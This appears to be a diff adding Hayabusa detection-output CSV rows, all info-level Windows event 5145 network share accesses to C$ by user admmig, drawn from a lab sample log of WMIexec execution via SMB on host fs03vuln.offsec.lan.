+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Contacts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Downloads\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Favorites\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
